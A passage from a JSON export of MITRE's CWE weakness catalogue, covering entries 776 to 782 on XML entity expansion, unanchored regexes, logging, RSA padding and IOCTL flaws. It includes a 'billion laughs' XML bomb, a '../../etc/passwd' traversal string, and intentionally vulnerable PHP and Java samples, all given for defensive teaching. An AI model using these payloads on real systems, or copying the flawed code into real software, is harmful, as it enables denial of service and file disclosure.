Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"776":{"attr":{"@_ID":"776","@_Name":"Improper Restriction of Recursive Entity References in DTDs (\'XML Entity Expansion\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses XML documents and allows their structure to be defined with a Document Type Definition (DTD), but it does not properly control the number of recursive definitions of entities.","Extended_Description":"If the DTD contains a large number of nested or recursive entities, this can lead to explosive growth of data when parsed, causing a denial of service.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"674","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"674","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"409","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"XML","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"XEE","Description":"XEE is the acronym commonly used for XML Entity Expansion."},{"Term":"Billion Laughs Attack"},{"Term":"XML Bomb","Description":"While the \\"XML Bomb\\" term was used in the early years of knowledge of this issue, the XEE term seems to be more commonly used."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"If parsed, recursive entity references allow the attacker to expand data exponentially, quickly consuming all system resources."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Operation","Description":"If possible, prohibit the use of DTDs or use an XML parser that limits the expansion of recursive DTD entities."},{"Phase":"Implementation","Description":"Before parsing XML files with associated DTDs, scan for recursive entity declarations and do not continue parsing potentially explosive content."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-53"},"Intro_Text":"The DTD and the very brief XML below illustrate what is meant by an XML bomb. The ZERO entity contains one character, the letter A. The choice of entity name ZERO is being used to indicate length equivalent to that exponent on two, that is, the length of ZERO is 2^0. Similarly, ONE refers to ZERO twice, therefore the XML parser will expand ONE to a length of 2, or 2^1. Ultimately, we reach entity THIRTYTWO, which will expand to 2^32 characters in length, or 4 GB, probably consuming far more data than expected.","Example_Code":{"attr":{"@_Nature":"attack","@_Language":"XML"},"xhtml:div":{"#text":"&lt;?xml version=\\"1.0\\"?&gt;&lt;!DOCTYPE MaliciousDTD [&lt;!ENTITY ZERO \\"A\\"&gt;&lt;!ENTITY ONE \\"&amp;ZERO;&amp;ZERO;\\"&gt;&lt;!ENTITY TWO \\"&amp;ONE;&amp;ONE;\\"&gt;...&lt;!ENTITY THIRTYTWO \\"&amp;THIRTYONE;&amp;THIRTYONE;\\"&gt;]&gt;&lt;data&gt;&amp;THIRTYTWO;&lt;/data&gt;","xhtml:br":["","","","","","","",""]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-3281","Description":"XEE in XML-parsing library.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281"},{"Reference":"CVE-2011-3288","Description":"XML bomb / XEE in enterprise communication product.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3288"},{"Reference":"CVE-2011-1755","Description":"\\"Billion laughs\\" attack in XMPP server daemon.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1755"},{"Reference":"CVE-2009-1955","Description":"XML bomb in web server module","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1955"},{"Reference":"CVE-2003-1564","Description":"Parsing library allows XML bomb","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1564"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":44,"Entry_Name":"XML Entity Expansion"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-676"}},{"attr":{"@_External_Reference_ID":"REF-677"}},{"attr":{"@_External_Reference_ID":"REF-678"}},{"attr":{"@_External_Reference_ID":"REF-679"}},{"attr":{"@_External_Reference_ID":"REF-680"}},{"attr":{"@_External_Reference_ID":"REF-500"}},{"attr":{"@_External_Reference_ID":"REF-682"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-06-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Description, Name, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":{"#text":"Unrestricted Recursive Entity References in DTDs (\'XML Bomb\')","attr":{"@_Date":"2013-02-21"}}}},"777":{"attr":{"@_ID":"777","@_Name":"Regular Expression without Anchors","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a regular expression to perform neutralization, but the regular expression is not anchored and may allow malicious or malformed data to slip through.","Extended_Description":"When performing tasks such as validating against a set of allowed inputs (allowlist), data is examined and possibly modified to ensure that it is well-formed and adheres to a list of safe values. If the regular expression is not anchored, malicious or malformed data may be included before or after any string matching the regular expression. The type of malicious data that is allowed will depend on the context of the application and which anchors are omitted from the regular expression.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"625","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Background_Details":{"Background_Detail":"Regular expressions are typically used to match a pattern of text. Anchors are used in regular expressions to specify where the pattern should match: at the beginning, the end, or both (the whole input)."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Availability","Confidentiality","Access Control"],"Impact":"Bypass Protection Mechanism","Note":"An unanchored regular expression in the context of an allowlist will possibly result in a protection mechanism failure, allowing malicious or malformed data to enter trusted regions of the program. The specific consequences will depend on what functionality the allowlist was protecting."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Be sure to understand both what will be matched and what will not be matched by a regular expression. Anchoring the ends of the expression will allow the programmer to define an allowlist strictly limited to what is matched by the text in the regular expression. If you are using a package that only matches one line by default, ensure that you can match multi-line inputs if necessary."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider a web application that supports multiple languages. It selects messages for an appropriate language by using the lang parameter.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$dir = \\"/home/cwe/languages\\";$lang = $_GET[\'lang\'];if (preg_match(\\"/[A-Za-z0-9]+/\\", $lang)) {}else {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"include(\\"$dir/$lang\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \\"You shall not pass!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../etc/passwd"}],"Body_Text":["The previous code attempts to match only alphanumeric values so that language values such as \\"english\\" and \\"french\\" are valid while also protecting against path traversal, CWE-22. However, the regular expression anchors are omitted, so any text containing at least one alphanumeric character will now pass the validation step. For example, the attack string below will match the regular expression.","If the attacker can inject code sequences into a file, such as the web server\'s HTTP request log, then the attacker may be able to redirect the lang parameter to the log file and execute arbitrary code."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-06-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences, Description, Potential_Mitigations"}]}},"778":{"attr":{"@_ID":"778","@_Name":"Insufficient Logging","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"When a security-critical event occurs, the software either does not record the event or omits important details about the event when logging it.","Extended_Description":"When security-critical events are not logged properly, such as a failed login attempt, this can make malicious behavior more difficult to detect and may hinder forensic analysis after an attack succeeds.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"223","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"If security critical information is not recorded, there will be no trail for forensic analysis and discovering the cause of problems or the source of attacks may become more difficult or impossible."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use a centralized logging mechanism that supports multiple levels of detail. Ensure that all security-related successes and failures can be logged."},{"Phase":"Operation","Description":"Be sure to set the level of logging appropriately in a production environment. Sufficient data should be logged to enable system administrators to detect attacks, diagnose errors, and recover from attacks. At the same time, logging too much data (CWE-779) can cause the same problems."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The example below shows a configuration for the service security audit feature in the Windows Communication Foundation (WCF).","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;system.serviceModel&gt;&lt;/system.serviceModel&gt;","xhtml:div":{"#text":"&lt;behaviors&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;serviceBehaviors&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;behavior name=\\"NewBehavior\\"&gt;...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;serviceSecurityAudit auditLogLocation=\\"Default\\"suppressAuditFailure=\\"false\\"serviceAuthorizationAuditLevel=\\"None\\"messageAuthenticationAuditLevel=\\"None\\" /&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},"xhtml:br":["",""]}}}}},{"attr":{"@_Nature":"good","@_Language":"XML"},"xhtml:div":{"#text":"&lt;system.serviceModel&gt;&lt;/system.serviceModel&gt;","xhtml:div":{"#text":"&lt;behaviors&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;serviceBehaviors&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;behavior name=\\"NewBehavior\\"&gt;...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;serviceSecurityAudit auditLogLocation=\\"Default\\"suppressAuditFailure=\\"false\\"serviceAuthorizationAuditLevel=\\"SuccessAndFailure\\"messageAuthenticationAuditLevel=\\"SuccessAndFailure\\" /&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},"xhtml:br":["",""]}}}}}],"Body_Text":["The previous configuration file has effectively disabled the recording of security-critical events, which would force the administrator to look to other sources during debug or recovery efforts.","Logging failed authentication attempts can warn administrators of potential brute force attacks. Similarly, logging successful authentication events can provide a useful audit trail when a legitimate account is compromised. The following configuration shows appropriate settings, assuming that the site does not have excessive traffic, which could fill the logs if there are a large number of success or failure events (CWE-779)."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-4315","Description":"server does not log failed authentication attempts, making it easier for attackers to perform brute force password guessing without being detected","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4315"},{"Reference":"CVE-2008-1203","Description":"admin interface does not log failed authentication attempts, making it easier for attackers to perform brute force password guessing without being detected","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1203"},{"Reference":"CVE-2007-3730","Description":"default configuration for POP server does not log source IP or username for login attempts","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3730"},{"Reference":"CVE-2007-1225","Description":"proxy does not log requests without \\"http://\\" in the URL, allowing web surfers to access restricted web content without detection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1225"},{"Reference":"CVE-2003-1566","Description":"web server does not log requests for a non-standard request type","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1566"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Accountability&#34;, Page 40"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-02"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Organization":"Fortify Software","Contribution_Date":"2009-07-02","Contribution_Comment":"Provided code example and additional information for description and consequences."}}},"779":{"attr":{"@_ID":"779","@_Name":"Logging of Excessive Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software logs too much information, making log files hard to process and possibly hindering recovery efforts or forensic analysis after an attack.","Extended_Description":"While logging is a good practice in general, and very high levels of logging are appropriate for debugging stages of development, too much logging in a production environment might hinder a system administrator\'s ability to detect anomalous conditions. This can provide cover for an attacker while attempting to penetrate a system, clutter the audit trail for forensic analysis, or make it more difficult to debug problems in a production environment.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Other)"],"Note":"Log files can become so large that they consume excessive resources, such as disk and CPU, which can hinder the performance of the system."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Logging too much information can make the log files of less use to forensics analysts and developers when trying to diagnose a problem or recover from an attack."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"If system administrators are unable to effectively process log files, attempted attacks may go undetected, possibly leading to eventual system compromise."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Suppress large numbers of duplicate log messages and replace them with periodic summaries. For example, syslog may include an entry that states \\"last message repeated X times\\" when recording repeated events."},{"Phase":"Architecture and Design","Description":"Support a maximum size for the log file that can be controlled by the administrator. If the maximum size is reached, the admin should be notified. Also, consider reducing functionality of the software. This may result in a denial-of-service to legitimate software users, but it will prevent the software from adversely impacting the entire system."},{"Phase":"Implementation","Description":"Adjust configurations appropriately when software is transitioned from a debug state to production."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0421","Description":"server records a large amount of data to the server log when it receives malformed headers","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0421"},{"Reference":"CVE-2002-1154","Description":"chain: application does not restrict access to front-end for updates, which allows attacker to fill the error log","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1154"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-02"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"780":{"attr":{"@_ID":"780","@_Name":"Use of RSA Algorithm without OAEP","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses the RSA algorithm but does not incorporate Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.","Extended_Description":"Padding schemes are often used with cryptographic algorithms to make the plaintext less predictable and complicate attack efforts. The OAEP scheme is often used with RSA to nullify the impact of predictable common text.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"327","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"Without OAEP in RSA encryption, it will take less work for an attacker to decrypt the data or to infer patterns from the ciphertext."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The example below attempts to build an RSA cipher.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public Cipher getRSACipher() {}","xhtml:div":{"#text":"Cipher rsa = null;try {}catch (java.security.NoSuchAlgorithmException e) {}catch (javax.crypto.NoSuchPaddingException e) {}return rsa;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"rsa = javax.crypto.Cipher.getInstance(\\"RSA/NONE/NoPadding\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"log(\\"this should never happen\\", e);","attr":{"@_style":"margin-left:10px;"}},{"#text":"log(\\"this should never happen\\", e);","attr":{"@_style":"margin-left:10px;"}}]}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public Cipher getRSACipher() {}","xhtml:div":{"#text":"Cipher rsa = null;try {}catch (java.security.NoSuchAlgorithmException e) {}catch (javax.crypto.NoSuchPaddingException e) {}return rsa;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"rsa = javax.crypto.Cipher.getInstance(\\"RSA/ECB/OAEPWithMD5AndMGF1Padding\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"log(\\"this should never happen\\", e);","attr":{"@_style":"margin-left:10px;"}},{"#text":"log(\\"this should never happen\\", e);","attr":{"@_style":"margin-left:10px;"}}]}}}],"Body_Text":"While the previous code successfully creates an RSA cipher, the cipher does not use padding. The following code creates an RSA cipher using OAEP."}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-694"}},{"attr":{"@_External_Reference_ID":"REF-695"}}]},"Notes":{"Note":{"#text":"This entry could probably have a new parent related to improper padding, however the role of padding in cryptographic algorithms can vary, such as hiding the length of the plaintext and providing additional random bits for the cipher. In general, cryptographic problems in CWE are not well organized and further research is needed.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Organization":"Fortify Software","Submission_Date":"2009-07-08","Submission_Comment":"Based on information from Fortify Software."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"781":{"attr":{"@_ID":"781","@_Name":"Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software defines an IOCTL that uses METHOD_NEITHER for I/O, but it does not validate or incorrectly validates the addresses that are provided.","Extended_Description":"When an IOCTL uses the METHOD_NEITHER option for I/O control, it is the responsibility of the IOCTL to validate the addresses that have been supplied to it. If validation is missing or incorrect, attackers can supply arbitrary memory addresses, leading to code execution or a denial of service.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"822","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}}],"Operating_System":{"attr":{"@_Name":"Windows NT","@_Prevalence":"Sometimes"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["Modify Memory","Read Memory","Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart"],"Note":"An attacker may be able to access memory that belongs to another process or user. If the attacker can control the contents that the IOCTL writes, it may lead to code execution at high privilege levels. At the least, a crash can occur."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"If METHOD_NEITHER is required for the IOCTL, then ensure that all user-space addresses are properly validated before they are first accessed. The ProbeForRead and ProbeForWrite routines are available for this task. Also properly protect and manage the user-supplied buffers, since the I/O Manager does not do this when METHOD_NEITHER is being used. See References."},{"Phase":"Architecture and Design","Description":"If possible, avoid using METHOD_NEITHER in the IOCTL and select methods that effectively control the buffer size, such as METHOD_BUFFERED, METHOD_IN_DIRECT, or METHOD_OUT_DIRECT."},{"Phase":["Architecture and Design","Implementation"],"Description":"If the IOCTL is part of a driver that is only intended to be accessed by trusted users, then use proper access control for the associated device or device namespace. See References."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-2373","Description":"Driver for file-sharing and messaging protocol allows attackers to execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2373"},{"Reference":"CVE-2009-0686","Description":"Anti-virus product does not validate addresses, allowing attackers to gain SYSTEM privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0686"},{"Reference":"CVE-2009-0824","Description":"DVD software allows attackers to cause a crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0824"},{"Reference":"CVE-2008-5724","Description":"Personal firewall allows attackers to gain SYSTEM privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5724"},{"Reference":"CVE-2007-5756","Description":"chain: device driver for packet-capturing software allows access to an unintended IOCTL with resultant array index error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5756"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-696"}},{"attr":{"@_External_Reference_ID":"REF-697"}},{"attr":{"@_External_Reference_ID":"REF-698"}},{"attr":{"@_External_Reference_ID":"REF-699"}},{"attr":{"@_External_Reference_ID":"REF-700"}},{"attr":{"@_External_Reference_ID":"REF-701"}},{"attr":{"@_External_Reference_ID":"REF-702"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"Because IOCTL functionality is typically performing low-level actions and closely interacts with the operating system, this weakness may only appear in code that is written in low-level languages."},{"attr":{"@_Type":"Research Gap"},"xhtml:p":["While this type of issue has been known since 2006, it is probably still under-studied and under-reported. Most of the focus has been on high-profile software and security products, but other kinds of system software also use drivers. Since exploitation requires the development of custom code, it requires some skill to find this weakness.","Because exploitation typically requires local privileges, it might not be a priority for active attackers. However, remote exploitation may be possible for software such as device drivers. Even when remote vectors are not available, it may be useful as the final privilege-escalation step in multi-stage remote attacks against application-layer software, or as the primary attack by a local user on a multi-user system."]}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}]}},"782":{"attr":{"@_ID":"782","@_Name":"Exposed IOCTL with Insufficient Access Control","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software implements an IOCTL with functionality that should be restricted, but it does not properly enforce access control for the IOCTL.","Extended_Description":{"xhtml:p":["When an IOCTL contains privileged functionality and is exposed unnecessarily, attackers may be able to access this functionality by invoking the IOCTL. Even if the functionality is benign, if the programmer has assumed that the IOCTL would only be accessed by a trusted process, there may be little or no validation of the incoming data, exposing weaknesses that would never be reachable if the attacker cannot call the IOCTL directly.","The implementations of IOCTLs will differ between operating system types and versions, so the methods of attack and prevention may vary widely."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"749","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"781","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}}],"Operating_System":[{"attr":{"@_Class":"Unix","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Note":"Attackers can invoke any functionality that the IOCTL offers. Depending on the functionality, the consequences may include code execution, denial-of-service, and theft of data."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"In Windows environments, use proper access control for the associated device or device namespace. See References."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2208","Description":"Operating system does not enforce permissions on an IOCTL that can be used to modify network settings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2208"},{"Reference":"CVE-2008-3831","Description":"Device driver does not restrict 